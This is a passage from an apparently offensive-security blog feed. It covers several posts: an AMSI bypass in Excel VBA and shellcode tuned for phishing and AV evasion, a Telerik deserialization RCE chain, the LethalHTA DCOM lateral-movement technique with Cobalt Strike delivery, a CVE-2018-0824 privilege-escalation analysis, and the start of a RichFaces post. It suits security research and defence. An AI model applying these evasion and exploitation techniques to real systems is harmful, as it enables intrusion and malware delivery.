The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:

Okay, that's exactly what we expected. Are we done? No, not yet as we promised to provide an AMSI bypass for EXCEL/VBA so let's move on..

Bypassing AMSI in Excel using VBA

Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.

After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().

After some code fiddling we came up with the following code.

As you can see we put some time measurement around the main loop. The number of rounds the loop may take can be several hundred thousand iterations and in addition with the poor VBA performance we expected a significant amount of time the bypass will take. Time is a crucial thing in a real attack scenario. If our phishing victim opens a malicious Excel sheet it is not acceptable that the embedded script blocks the execution for let's say more than one or two seconds. At least after 5 seconds of perceived unresponsiveness of the application a human will get impatient and do things like trying to close Excel, which is not what we want.

So let's see how long the bypass will take. To be honest, we did not expect what was happening. The result was difficult to reproduce but the measured runtime varied from 15 minutes to endless. In some rare cases Excel was closed after some minutes without any further notice. This was probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.

Okay so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses another strategy as e.g. PowerShell does. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a little smarter approach which is based on so called triggers. Microsoft considers pure VBA code to be harmless until the point when imports come into play. That's exactly what we do - importing functions from external DLLs. Some of these imports are treated as potentially dangerous and their call including all parameters are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS defender the opportunity to check data behind addresses which of course makes sense. Let's see what data is sent to the AMSI API in our explicit case by breaking on AmsiScanBuffer using windbg:

As we can see the ring buffer contains all functions we imported including their parameter values. Our Windows 10 System has MS Defender installed and activated. So every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as In-process COM in the first place. But to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen on the next architecture overview provided by MS:

Source: https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps
The little green block on the bottom of the figure shows that our process (Excel) indirectly communicates via rpc with Defender. Hmm... Okay so this is done several 100k times, which is just too much and explains the long runtime. To provide some more evidence we repeat the bypass with Defender switched off, which should significantly speed up our bypass. In addition to that we monitor the amount of calls to AmsiScanBuffer() so we can get an impression how often it is called.

The same loop with Defender disabled took something between one and two minutes:

In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:

AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930) which is roughly the amount of iterations our loop did. That's a lot and underlines our assumptions that AMSI is just called very often. So we understood what is going on, but currently there seems no workaround available to solve our runtime problem.

Giving up now? Not yet...

Improving AMSI Bypass in Excel

As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?

One of the functions we imported is RtlMoveMemory() which is as mentioned earlier used by a lot of malware. Monitoring this function would make a lot of sense and it might be considered as trigger. Let's verify that by just removing the call to CopyMem (the alias for RtlMoveMemory) and see what happens. This prevents our bypass from working but it might give us some insight.

The runtime is now at 0.8 seconds. Wow okay, this really made a change. It shall be noted that in this configuration we even walk through the whole heap. Due to the missing call to RtlMoveMemory() we will not find our pattern.

After we identified our bottleneck, what can we do? We will have to find an alternative method to access raw memory which is not treated as trigger by Excel. Some random Googling revealed the following function: CryptBinaryToStringA() which is part of crypt32.dll. The latter should be present on most Windows systems and thus it should be okay to import it.

The function is intended to convert strings from one format to another but it can also be used to just simply copy bytes from an arbitrary memory position we specify. Cool, that's exactly what we are after! In order to abuse this function for our purpose we call it like that to read the lpData field from the Process Heap Entry structure:
The input parameter from left to right explained:
  • phe.lpData is the source we want to copy data from,
  • ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
  • ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
  • ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
  • the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied

So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.

Our loop now takes about four seconds to finish, that is still much but it finished and it told us that it found the pattern we are looking after. Let's see how many times Excel calls AmsiScanBuffer() now with this version:


Oh my... Excel did not call AmsiScanBuffer() at all. So this means as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: As soon as we use one single trigger function, Excel will send all calls to AMSI. Good to know...

This is the first time we can really verify if the bypass works. So let's look for some code which triggers AMSI from VBA. Iliya Dafchev shows some port of an older AMSI Bypass to VBA which gets flagged by AMSI itself in the first place. Perfect, we will put this code into a function called triggerAMSI() and use it as positive test:

After running it Excel complains as expected with a warning and just closes our current instance of Excel:

AMSI Alert by Excel - sorry for the German!
Putting our bypass and our positive test together we get the following function:


Hopes are high, that the message box containing “we survived” gets displayed because we killed AMSI before triggering it.


Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm.. just wait, how long did the whole thing take? four seconds? Repeated execution of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.

Giving up now? Not yet...

Improving AMSI Bypass in Excel - continued

In the last chapter we improved our AMSI bypass from infinite runtime to ten seconds or below. This seems to be still too much for a real campaign (our opinion). So what can we do to speed up the whole thing one more time?

The loop takes some 100k iterations which is done in C in no time. Defender is completely out of the game. So our current runtime seems to be a pure result of the bad VBA performance. To be fair, these kind of things we are currently trying to do are not a typical VBA task so let's blame us instead of Excel for doing crazy stuff...

Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions the execution of shellcode should not be a problem. This code snippet shows an example how to do that within VBA. The next step is converting our VBA code (or more our initial C code) into assembly language, that is, into shellcode.

Everyone who ever wrote some pieces of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known during the time the shellcode gets assembled. This means we have to implement a mechanism like GetProcAddress() to lookup the addresses of required functions during runtime. How to do this without any library support is well understood and extensively documented so we will not go into details here. Implementing this part of the shellcode is left as an excercise for the reader.

Of course there are many ready to use code snippets which should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun and self written shellcode should be unlikely to get caught by AV solutions.

The main loop of our AMSI bypass in assembly can be found here.

The structure ShellCodeEnvironment holds some important information like the looked up address of our HeapWalk() and GetProcessHeaps() function. The rest of the loop should be straight forward...

So putting everything together we generate our shellcode, put it into our VBA code and start it from there as new thread. Of course we measure the runtime again:


This time it is only 0.02 seconds!

We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.

Summary

We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptions, also works for PowerShell and .Net 4.8. The latter also comes with AMSI support integrated in its Common Language Runtime. As per Microsoft AMSI is not a security boundary so we do not expect that much reaction but are still curious if MS will develop some detection mechanisms for this idea.

Telerik Revisited

7 February 2019 at 10:04

In 2017, several vulnerabilities were discovered in Telerik UI, a popular UI component library for .NET web applications. Although details and working exploits are public, it often proves to be a good idea to take a closer look at it. Because sometimes it allows you to explore new avenues of exploitation.

Introduction

Telerik UI for ASP.NET is a popular UI component library for ASP.NET web applications. In 2017, several vulnerabilities were discovered, potentially resulting in remote code execution:

CVE-2017-9248: Cryptographic Weakness
A cryptographic weakness allows the disclosure of the encryption key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey) used to protect the DialogParameters via an oracle attack. It can be exploited to forge a functional file manager dialog and upload arbitrary files and/or compromise the ASP.NET ViewState in case of the latter.
CVE-2017-11317: Hard-coded default key
A hard-coded default key is used to encrypt/decrypt the AsyncUploadConfiguration, which holds the path where uploaded files are stored temporarily. It can be exploited to upload files to arbitrary locations.
CVE-2017-11357: Insecure Direct Object Reference
The name of the file stored in the location specified in AsyncUploadConfiguration is taken from the request and thus allows the upload of files with arbitrary extension.

The vulnerabilities were fixed in R2 2017 SP1 (2017.2.621) and R2 2017 SP2 (2017.2.711), respectively. As for CVE-2017-9248, there is an analysis by PatchAdvisor[1] that gives some insights and exploitation hints. And regarding CVE-2017-11317, the detailed writeup by @straight_blast seems to have been published even half a year before Telerik published an updated version. It describes in detail how the vulnerability was discovered and how it can be exploited to upload an arbitrary file to an arbitrary location. If you're unfamiliar with these vulnerabilities, you may want to read the linked advisories first to get a better understanding.

The Catch

Although the vulnerabilities sound promising, they all have their catch: exploiting CVE-2017-9248 requires many thousands of requests, which can be pretty noticeable and suspicious. And unless it is actually possible to leak the MachineKey (which would allow an exploitation via deserialization of arbitrary ObjectStateFormatter stream), a file upload to an arbitrary location (i. e., CVE-2017-11317) is still limited to the knowledge of an appropriate location with sufficient write permissions.

The problem here is that by default the account that the IIS worker process w3wp.exe runs with is a special account like IIS AppPool\DefaultAppPool. And such an account usually does not have write permissions to the web document root directory like C:\inetpub\wwwroot or similar. Additionally, the web document root of the web application can also be somewhere else and may not be known. So simply writing an ASP.NET web shell probably won't work in many cases.

The Dead End

This was exactly the case when we faced Managed Workplace RMM by Avast Business in a red team assessment where we didn't want to make too much noise. Additionally, unauthenticated access to all *.aspx pages except for Login.aspx was denied, i. e., the handler Telerik.Web.UI.DialogHandler.aspx for exploiting CVE-2017-9248 was not reachable, and the other one, Telerik.Web.UI.SpellCheckHandler.axd, was not registered. So, CVE-2017-11317 seemed to be the only option left.

By enumerating known versions of Telerik Web UI, one request to upload to C:\Windows\Temp was finally successful. But an upload to C:\inetpub\wwwroot did not succeed. And since we did not have access to an installation of Managed Workplace, we had no insights into its directory structure. So this seemed to be a dead end.

The New Avenue

While tracing the path of the provided rauPostData through the Telerik code, there was one aspect that became apparent that was never mentioned before by anyone else: The exploitation of CVE-2017-11317 was always advertised as an arbitrary upload. This seems obvious as the handler's name is AsyncUploadHandler and rauPostData contains the upload configuration.

But after taking a closer look at the code that processes the rauPostData, it showed that the rauPostData is expected to consist of two parts separated by a &.

// Telerik.Web.UI.AsyncUpload.SerializationService
internal static object Deserialize(string obj, Type type)
{
 JavaScriptSerializer serializer = SerializationService.GetSerializer(obj.Length);
 SerializationService.ApplyConverters(type, serializer);
 MethodInfo methodInfo = typeof(JavaScriptSerializer).GetMethod("Deserialize", new Type[]
 {
  typeof(string)
 }, null).MakeGenericMethod(new Type[]
 {
  type
 });
 return methodInfo.Invoke(serializer, new object[]
 {
  obj
 });
}

The first part is the JSON data (line 9). And the second part is the assembly qualified type name (line 10) that the JSON data should be deserialize to. The call in line 11 then ends up in SerializationService.Deserialize(string, Type).

// Telerik.Web.UI.AsyncUploadHandler
internal IAsyncUploadConfiguration GetConfiguration(string rawData)
{
 string[] array = rawData.Split(new char[]
 {
  '&'
 });
 string obj = array[0];
 Type type = Type.GetType(CryptoService.GetService().Decrypt(array[1]));
 IAsyncUploadConfiguration asyncUploadConfiguration = (IAsyncUploadConfiguration)SerializationService.Deserialize(obj, type, true);
 if (!this.IsValidHMac(asyncUploadConfiguration.TargetFolder) || !this.IsValidHMac(asyncUploadConfiguration.TempTargetFolder))
 {
  throw new CryptographicException("The hash is not valid!");
 }
 asyncUploadConfiguration.TargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TargetFolder));
 asyncUploadConfiguration.TempTargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TempTargetFolder));
 return asyncUploadConfiguration;
}

Here a JavaScriptSerializer gets parameterized with the type provided in the rauPostData. That means this is an arbitrary JavaScriptSerializer deserialization!

From the research Friday the 13th JSON Attacks by Alvaro Muñoz & Oleksandr Mirosh it is known that arbitrary JavaScriptSerializer deserialization can be harmful if the expected type can be specified by the attacker. During deserialization, appropriate setter methods get called. A suitable gadget is the System.Configuration.Install.AssemblyInstaller, which allows the loading of a DLL by specifying its path. If the DLL is a mixed mode assembly, its DllMain() entry point gets called on load, which allows the execution of arbitrary code in the context of the w3wp.exe process.

This allowed the remote code execution on Managed Workplace without authentication. The issue has been addressed and should be fixed in Managed Workplace 11 SP4 MR2.

Conclusion

So CVE-2017-11317 can be exploited even without the requirement of being able to write to the web document root:

  1. Upload a mixed mode assembly DLL to a writable location using the regular AsyncUploadConfiguration exploit.
  2. Load the uploaded DLL and thereby trigger its DllMain() function using the AssemblyInstaller exploit described above.

This is an excellent example that revisiting old vulnerabilities can be worthwhile and result in new ways out of a supposed dead end.


LethalHTA - A new lateral movement technique using DCOM and HTA

By: Unknown
6 July 2018 at 12:08

The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research on this technique is partly an outcome of our recent research efforts on COM Marshalling: Marshalling to SYSTEM - An analysis of CVE-2018-0824.

Previous Work

Several lateral movement techniques using DCOM were discovered in the past by Matt Nelson, Ryan Hanson, Philip Tsukerman and @bohops. A good overview of all the known techniques can be found in the blog post by Philip Tsukerman. Most of the existing techniques execute commands via ShellExecute(Ex). Some COM objects provided by Microsoft Office allow you to execute script code (e.g VBScript) which makes detection and forensics even harder.

LethalHTA

LethalHTA is based on a very well-known COM object that was used in all the Office Moniker attacks in the past (see FireEye's blog post):

  • ProgID: "htafile"
  • CLSID : "{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
  • AppID : "{40AEEAB6-8FDA-41E3-9A5F-8350D4CFCA91}"
Using James Forshaw's OleViewDotNet we get some details on the COM object. The COM object runs as local server.

It has an App ID and default launch and access permissions. Only COM objects having an App ID can be used for lateral movement.

It also implements various interfaces as we can see from OleViewDotNet.

One of the interfaces is IPersistMoniker. This interface is used to save/restore a COM object's state to/from an IMoniker instance.

Our initial plan was to create the COM object and restore its state by calling the IPersistMoniker->Load() method with a URLMoniker pointing to an HTA file. So we created a small program and run it in VisualStudio.

But calling IPersistMoniker->Load() returned an error code 0x80070057. After some debugging we realized that the error code came from a call to CUrlMon::GetMarshalSizeMax(). That method is called during custom marshalling of a URLMoniker. This makes perfect sense since we called IPersistMoniker->Load() with a URLMoniker as a parameter. Since we do a method call on a remote COM object the parameters need to get (custom) marshalled and sent over RPC to the RPC endpoint of the COM server.

So looking at the implementation of CUrlMon::GetMarshalSizeMax() in IDA Pro we can see a call to CUrlMon::ValidateMarshalParams() at the very beginning.

At the very end of this function we can find the error code set as return value of the function. Microsoft is validating the dwDestContext parameter. If the parameter is MSHCTX_DIFFERENTMACHINE (0x2) then we eventually reach the error code.

As we can see from the references to CUrlMon::ValidateMarshalParams() the method is called from several functions during marshalling.

In order to bypass the validation we can take the same approach as described in our last blog post: Creating a fake object. The fake object needs to implement IMarshal and IMoniker. It forwards all calls to the URLMoniker instance. To bypass the validation the implementation methods for CUrlMon::GetMarshalSizeMax, CUrlMon::GetUnmarshalClass, CUrlMon::MarshalInterface need to modify the dwDestContext parameter to MSHCTX_NOSHAREDMEM(0x1). The implementation for CUrlMon::GetMarshalSizeMax() is shown in the following code snippet.

And that's all we need to bypass the validation. Of course we could also patch the code in urlmon.dll. But that would require us to call VirtualProtect() to make the page writable and modify CUrlMon::ValidateMarshalParams() to always return zero. Calling VirtualProtect() might get caught by EDR or "advanced" AV products so we wouldn't recommend it.

Now we are able to call the IPersistMoniker->Load() on the remote COM object. The COM object implemented in mshta.exe will load the HTA file from the URL and evaluate its content. As you already know the HTA file can contain script code such as JScript or VBScript. You can even combine our technique with James Forshaw's DotNetToJScript to run your payload directly from memory!

It should be noted that the file doesn't necessarily need to have the hta file extension. Extensions such as html, txt, rtf work fine as well as no extension at all.

LethalHTA and LethalHTADotNet

We created implementations of our technique in C++ and C#. You can run them as standalone programms. The C++ version is more a proof-of-concept and might help you creating a reflective DLL from it. The C# version can also be loaded as an Assembly with Assembly.Load(Byte[]) which makes it easy to use it in a Powershell script. You can find both implementations under releases on our GitHub.

CobaltStrike Integration

To be able to easily use this technique in our day-to-day work we created a Cobalt Strike Aggressor Script called LethalHTA.cna that integrates the .NET implementation (LethalHTADotNet) into Cobalt Strike by providing two distinct methods for lateral movement that are integrated into the GUI, named HTA PowerShell Delivery (staged - x86) and HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)

The HTA PowerShell Delivery method allows to execute a PowerShell based, staged beacon on the target system. Since the PowerShell beacon is staged, the target systems need to be able to reach the HTTP(S) host and TeamServer (which are in most cases on the same system).

The HTA .NET In-Memory Delivery takes the technique a step further by implementing a memory-only solution that provides far more flexibility in terms of payload delivery and stealth. Using the this option it is possible to tunnel the HTA delivery/retrieval process through the beacon and also to specify a proxy server. If the target system is not able to reach the TeamServer or any other Internet-connected system, an SMB listener can be used instead. This allows to reach systems deep inside the network by bootstrapping an SMB beacon on the target and connecting to it via named pipe from one of the internal beacons.

Due to the techniques used, everything is done within the mshta.exe process without creating additional processes.

The combination of two techniques, in addition to the HTA attack vector described above, is used to execute everything in-memory. Utilizing DotNetToJScript, we are able to load a small .NET class (SCLoader) that dynamically determines the processes architecture (x86 or x64) and then executes the included stageless beacon shellcode. This technique can also be re-used in other scenarios where it is not apparent which architecture is used before exploitation.

For a detailed explanation of the steps involved visit our GitHub Project.

Detection

To detect our technique you can watch for files inside the INetCache (%windir%\[System32 or SysWOW64]\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\) folder containing "ActiveXObject". This is due to mshta.exe caching the payload file. Furthermore it can be detected by an mshta.exe process spawned by svchost.exe.

Marshalling to SYSTEM - An analysis of CVE-2018-0824

By: Unknown
15 June 2018 at 13:19
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.

Before I go into details I want to give you a quick introduction into COM and how deserialization/marshalling works. As I'm far from being an expert on COM, all this information is either based on the great book "Essential COM" by Don Box or the awesome Infiltrate '17 Talk "COM in 60 seconds". I have skipped several details (IDL/MIDL, Apartments, Standard Marshalling, etc.) just to keep the introduction short.

Introduction to COM and Marshalling

COM (Component Object Model) is a Windows middleware having reusable code (=component) as a primary goal. In order to develop reusable C++ code, Microsoft engineers designed COM in an object-oriented manner having the following key aspects in mind:
  • Portability
  • Encapsulation
  • Polymorphism
  • Separation of interfaces from implementation
  • Object extensibility
  • Resource Management
  • Language independence

COM objects are defined by an interface and implementation class. Both interface and implementation class are identified by a GUID. A COM object can implement several interfaces using inheritance.
All COM objects implement the IUnknown interface which looks like the following class definition in C++:

The QueryInterface() method is used to cast a COM object to a different interface implemented by the COM object. The AddRef() and Release() methods are used for reference counting.

Just to keep it short I rather go on with an existing COM object instead of creating an artificial example COM object. A Control Panel COM object is identified by the GUID {06622D85-6856-4460-8DE1-A81921B41C4B}. To find out more about the COM object we could analyze the registry manually or just use the great tool "OleView .NET".

The "Control Panel" COM object implements several interfaces as we can see in the screenshot of OleView .NET: The implementation class of the COM object (COpenControlPanel) can be found in shell32.dll. To open a "Control Panel" programmatically we make use of the COM API:
  • In line 6 we initialize the COM environment
  • In line 7 we create an instance of a "Control Panel" object
  • In line 8 we cast the instance to the IOpenControlPanel interface
  • In line 9 we open the "Control Panel" by calling the "Open" method
Inspecting the COM object in the debugger after running until line 9 shows us the virtual function table (vTable) of the object:

The function pointers in the vTable of the object point to the actual implementation functions in shell32.dll. The reason for that is that the COM object was created as a so called InProc server which means that shell32.dll got loaded into the current process address space. When passing CLSCTX_ALL, CoCreateInstance() tries to create an InProc server first. If it fails, other activation methods are tried (see CLSCTX enumeration).

By changing the CLSCTX_ALL parameter to function CoCreateInstance() to CLSCTX_LOCAL_SERVER and running the program again we can notice some differences: The vTable of the object contains now function pointers from the OneCoreUAPCommonProxyStub.dll. And the 4th function pointer which corresponds to the Open()" method now points to OneCoreUAPCommonProxyStub!ObjectStublessClient3().

The reason for that is that we created the COM object as an out-of-process server. The following diagram tries to give you an architectural overview (shamelessly borrowed from Project Zero):

The function pointers in the COM object point to functions of the proxy class. When we execute the IOpenControlPanel::Open()" method, the method OneCoreUAPCommonProxyStub!ObjectStublessClient3() gets called on the proxy. The proxy class itself eventually calls RPC methods (e.g. RPCRT4!NdrpClientCall3) to send the parameters to the RPC server in the out-of-process server. The parameters need to get serialized/marshalled to send them over RPC. In the out-of-process-server the parameters get deserialized/unmarshalled and the Stub invokes shell32!COpenControlPanel::Open(). For non-complex parameters like strings the serialization/marshalling is trivial as these are sent by value.

How about complex parameters like COM objects? As we can see from the method definition of IOpenControlPanel::Open() the third parameter is a pointer to an IUnknown COM object:
The answer is that a complex object can either get marshalled by reference (standard marshalling) or the serialization/marshalling logic can be customized by implementing the IMarshal interface (custom marshalling).

The IMarshal interface has a few methods as we can see in the following definition:
During serialization/marshalling of a COM object the IMarshal::GetUnmarshalClass() method gets called by the COM which returns the GUID of the class to be used for unmarshalling. Then the method IMarshal::GetMarshalSizeMax() is called to prepare a buffer for marshalling data. Finally the IMarshal::MarshalInterface() method is called which writes the custom marshalling data to the IStream object. The COM runtime sends the GUID of the "Unmarshal class" and the IStream object via RPC to the server.

On the server the COM runtime creates the "Unmarshal class" using the CoCreateInstance() function, casts it to the IMarshal interface using QueryInterface and eventually invokes the IMarshsal::UnmarshalInterface() method on the "Unmarshal class" instance, passing the IStream as a parameter.

And that's also where all the misery starts ...

Diffing the patch

After downloading the patch for Windows 8.1 x64 and extracting the files, I found two patched DLLs related to Microsoft COM:
  • oleaut32.dll
  • comsvcs.dll
Using Hexray's IDA Pro and Joxean Koret's Diaphora I analyzed the changes made by Microsoft.
In oleaut32.dll several functions were changed but nothing special related to deserialisation/marshalling:


In comsvcs.dll only four functions were changed:


Clearly, one method stood out: CMarshalInterceptor::UnmarshalInterface().

The method CMarshalInterceptor::UnmarshalInterface() is the implementation of the UnmarshalInterface() method of the IMarshal interface. As we already know from the introduction this method gets called during unmarshalling.

The bug

Further analysis was done on Windows 10 Redstone 4 (1803) including March patches (ISO from MSDN). In the very beginning of the method CMarshalInterceptor::UnmarshalInterface() 20 bytes are read from the IStream object into a buffer on the stack.

Later the bytes in the buffer are compared against the GUID of the CMarshalInterceptor class (ECABAFCB-7F19-11D2-978E-0000F8757E2A). If the bytes in the stream match we reach the function CMarshalInterceptor::CreateRecorder().


In function CMarshalInterceptor::CreateRecorder() the COM-API function ReadClassStm is called. This function reads a CLSID(GUID) from the IStream and stores it into a buffer on the stack. Then the CLSID gets compared against the GUID of a CompositeMoniker.
As you may have already followed the different Moniker "vulnerabilities" in 2016/17 (URLMoniker, ScriptMoniker, SOAPMoniker), Monikers are definitely something you want to find in code which you might be able to trigger.

The IMoniker interface inherits from IPersistStream which allows a COM object implementing it to load/save itself from/to an IStream object. Monikers identify objects uniquely and can locate, activate and get a reference to the object by calling the BindToObject() method of the IMoniker instance.

If the CLSID doesn't match the GUID of the CompositeMoniker we follow the path to the right. Here, the COM-API functionCoCreateInstance() is called with the CLSID read from the IStream as the first parameter. If COM finds the specific class and is able to cast it to an IMoniker interface we reach the next basic block. Next, the IPersistStream::Load() method is called on the newly created instance which restores the saved Moniker state from the IStream object.

And finally we reach the call to BindToObject() which triggers all evil ...

Exploiting the bug

For exploitation I'm following the same approach as described in the bug tracker issue "DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege" by Project Zero.
I'm creating a fake COM Object class which implements the IStorage and IMarshal interfaces.

All implementation methods for the IStorage interface will be forwarded to a real IStorage instance as we will see later. Since we are implementing custom marshalling, the COM runtime wants to know which class will be used to deserialize/unmarshal our fake object. Therefore the COM runtime calls IMarshal::GetUnmarshalClass(). To trigger the Moniker, we just need to return the GUID of the "QC Marshal Interceptor Class" class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).

The final step is to implement the IMarshal::MarshalInterface() method. As you already know the method gets called by the COM runtime to marshal an object into an IStream.
To trigger the call to IMoniker::BindToObject(), we only need to write the required bytes to the IStream object to satisfy all conditions in CMarshalInterceptor::UnmarshalInterface().

I tried to create a Script Moniker COM object with CLSID {06290BD3-48AA-11D2-8432-006008C3FBFC} using CoCreateInstance(). But hey, I got a "REGDB_E_CLASSNOTREG" error code. Looks like Microsoft introduced some changes. Apparently, the Script Moniker wouldn't work anymore. So I thought of exploiting the bug using the "URLMoniker/hta file". But luckily I remembered that in the method CMarshalInterceptor::CreateRecorder() we had a check for a CompositeMoniker CLSID.

So following the left path, we have a basic block in which 4 bytes are read from the stream into the stack buffer (var_78). Next we have a call to CMarshalInterceptor::LoadAndCompose() with the IStream, a pointer to an IMoniker interface pointer and the value from the stack buffer as parameters.

.
In this method an IMoniker instance is read and created from the IStream using the OleLoadFromStream() COM-API function. Later in the method, CMarshalInterceptor::LoadAndCompose() is called recursively to compose a CompositeMoniker. By invoking IMoniker::ComposeWith() a new IMoniker is created being a composition of two monikers. The pointer to the new CompositeMoniker will be stored in the pointer which was passed to the current function as parameter. As we have seen in one of the previous screenshots the BindToObject() method will be called on the CompositeMoniker later on.

As I remembered from Haifei Li's blog post there was a way to create a Script Moniker by composing a File Moniker and a New Moniker. Armed with that knowledge I implemented the final part of the IMarshal::MarshalInterface() method.

I placed a SCT file in "c:\temp\poc.sct" which runs notepad from an ActiveXObject. Then I tried BITS as a target server first which didn't work.

Using OleView .NET I found out that BITS doesn't support custom marshalling (see EOAC_NO_CUSTOM_MARSHAL). But the SearchIndexer service with CLSID {06622d85-6856-4460-8de1-a81921b41c4b} was running as SYSTEM and allowed custom marshalling.
So I created a PoC which has the following main() function.

The call to CoGetInstanceFromIStorage() will activate the target COM server and trigger the serialization of the FakeObject instance. Since the COM-API function requires an IStorage as a parameter, we had to implement the IStorage interface in our FakeObject class.
After running the POC we finally have a "notepad.exe" running as SYSTEM.


The POC can be found on our github.

The patch

Microsoft is now checking a flag read from the Thread-local storage. The flag is set in a different method not related to marshalling. If the flag isn't set, the function CMarshalInterceptor::UnmarshalInterface() will exit early without reading anything from the IStream.

Takeaways

Serialization/Unmarshalling without validating the input is bad. That's for sure.
Although this blog post only covers the privilege escalation aspect, the vulnerability can also be triggered from Microsoft Office or by an Active X running in the browser. But I will leave this as an exercise to the reader :-)

Poor RichFaces

30 May 2018 at 13:00

RichFaces is one of the most popular component libraries for JavaServer Faces (JSF). In the past, two vulnerabilities (CVE-2013-2165 and CVE-2015-0279) have been found that allow RCE in versions 3.x ≤ 3.3.3 and 4.x ≤ 4.5.3. Code White discovered two new vulnerabilities which bypass the implemented mitigations. Thereby, all RichFaces versions including the latest 3.3.4 and 4.5.17 are vulnerable to RCE.

Introduction

JavaServer Faces (JSF) is a framework for building user interfaces for web applications. While there are only two major JSF implementations (i. e., Apache MyFaces and Oracle Mojarra), there are several component libraries, which provide additional UI components and features. RichFaces is one of the most popular libraries among these component libraries and since it became part of JBoss (and thereby also part of Red Hat), it is also part of several JBoss/Red Hat products, for example JBoss EAP and JBoss Portal.[1]

RichFaces has three major version branches: 3.x, 4.x, and 5.x. However, as 5.x has never left alpha state, it is rather irrelevant. In early 2016, the developers of RichFaces announced the end-of-life of RichFaces in June 2016. The latest releases of the respective branches are 3.3.4 and 4.5.17.

The Past

In the past, two significant vulnerabilities have been discovered by Takeshi Terada of MBSD, which both affect various RichFaces versions:

CVE-2013-2165: Arbitrary Java Deserialization in RichFaces 3.x ≤ 3.3.3 and 4.x ≤ 4.3.2
Deserialization of arbitrary Java serialized object streams in org.ajax4jsf.resource.ResourceBuilderImpl allows remote code execution.
CVE-2015-0279: Arbitrary EL Evaluation in RichFaces 4.x ≤ 4.5.3 (RF-13977)
Injection of arbitrary EL method expressions in org.richfaces.resource.MediaOutputResource allows remote code execution.

Both vulnerabilities rely on the feature to generate images, video, sounds, and other resources on the fly based on data provided in the request. The provided data is either interpreted as a plain array of bytes or as a Java serialized object stream. In RichFaces 3.x, the data gets appended to the URL path preceded by either /DATB/ (byte array) or /DATA/ (Java serialized object stream); in RichFaces 4.x, the data is transmitted in a request parameter named db (byte array) or do (Java serialized object stream). In all cases, the binary data is compressed using DEFLATE and then encoded using a URL-safe Base64 encoding.

CVE-2013-2165: Arbitrary Java Deserialization

This vulnerability is a straight forward Java deserialization vulnerability. When a RichFaces 3.x resource is requested, it eventually gets processed by ResourceBuilderImpl.getResourceDataForKey(String). If the requested resource key begins with /DATA/, the remaining data gets decoded and decompressed (using ResourceBuilderImpl.decrypt(byte[]), which actually, despite its name, does not incorporate encryption[2]) and finally deserialized without any further validation.

In RichFaces 4.x, it is basically the same: the org.richfaces.resource.DefaultCodecResourceRequestData holds the request data passed via db/do and Util.decodeObjectData(String) is used in the latter case. That method then decodes and decompresses the data in a similar way and finally deserializes it without any further validation.

This can be exploited with ysoserial using a suitable gadget.

The arbitrary Java deserialization was patched in RichFaces 3.3.4 and 4.3.3 by introducing look-ahead deserialization with a limited set of whitelisted classes.[3] Due to several aftereffects, the list was extended occasionally.[4]

CVE-2015-0279: Arbitrary EL Evaluation

